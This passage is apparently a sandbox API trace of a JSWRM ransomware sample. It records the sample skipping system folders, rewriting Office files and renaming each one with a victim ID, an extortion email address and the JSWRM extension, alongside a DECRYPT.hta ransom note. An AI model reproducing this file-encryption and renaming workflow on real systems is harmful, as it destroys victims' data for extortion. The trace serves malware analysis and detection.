lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0131.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x241100, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImageSmall.jpg", lpUsedDefaultChar=0x0) returned 27 [0131.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0131.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0131.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x240fc0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImageSmall.jpg", lpUsedDefaultChar=0x0) returned 27 [0131.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247a88 [0131.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0131.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2473c0 [0131.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagesmall.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.427] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7639) returned 1 [0131.427] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dd0) returned 0x27b348 [0131.427] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1dd0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1dd0, lpOverlapped=0x0) returned 1 [0131.429] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.429] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1dd0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1dd0, lpOverlapped=0x0) returned 1 [0131.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.429] CloseHandle (hObject=0x264) returned 1 [0131.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247898 [0131.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0131.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0131.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2477a0 [0131.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0131.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.430] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagesmall.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagesmall.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0131.431] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e5aa5b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44e5aa5b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44e5aa5b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0131.431] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0131.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0131.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0131.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0131.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0131.431] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2798, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="MessageBoxIconImages.jpg", cAlternateFileName="MESSAG~1.JPG")) returned 1 [0131.431] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2=".") returned 1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="..") returned 1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="...") returned 1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="windows") returned -1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="recovery") returned -1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="perflogs") returned -1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="documents and settings") returned 1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="system volume information") returned -1 [0131.432] lstrcmpiW (lpString1="MessageBoxIconImages.jpg", lpString2="msocache") returned -1 [0131.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0131.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImages.jpg", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0131.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImages.jpg", cchWideChar=24, lpMultiByteStr=0x241330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageBoxIconImages.jpg", lpUsedDefaultChar=0x0) returned 24 [0131.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0131.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0131.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImages.jpg", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0131.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImages.jpg", cchWideChar=24, lpMultiByteStr=0x241308, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageBoxIconImages.jpg", lpUsedDefaultChar=0x0) returned 24 [0131.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0131.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0131.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0131.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0131.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.433] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=10136) returned 1 [0131.433] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2790) returned 0x27b348 [0131.433] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2790, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x2790, lpOverlapped=0x0) returned 1 [0131.435] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.435] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x2790, lpOverlapped=0x0) returned 1 [0131.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.435] CloseHandle (hObject=0x264) returned 1 [0131.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0131.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0131.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0131.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x248058 [0131.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0131.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.436] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimages.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimages.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0131.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0131.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0131.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0131.437] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19889710, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc0, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="MessageBoxIconImagesMask.bmp", cAlternateFileName="MESSAG~1.BMP")) returned 1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2=".") returned 1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="..") returned 1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="...") returned 1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="windows") returned -1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="recovery") returned -1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="perflogs") returned -1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="system volume information") returned -1 [0131.437] lstrcmpiW (lpString1="MessageBoxIconImagesMask.bmp", lpString2="msocache") returned -1 [0131.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0131.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0131.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0131.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x240ef8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageBoxIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 28 [0131.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0131.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0131.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0131.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageBoxIconImagesMask.bmp", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageBoxIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 28 [0131.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0131.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0131.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2475b0 [0131.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.438] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=192) returned 1 [0131.438] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0131.438] ReadFile (in: hFile=0x264, lpBuffer=0x24b510, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesRead=0x345de64*=0xc0, lpOverlapped=0x0) returned 1 [0131.439] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.439] WriteFile (in: hFile=0x264, lpBuffer=0x24b510*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesWritten=0x345de60*=0xc0, lpOverlapped=0x0) returned 1 [0131.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0131.439] CloseHandle (hObject=0x264) returned 1 [0131.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0131.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.440] RtlAllocateHeap (HeapHandle=0x1e0000, 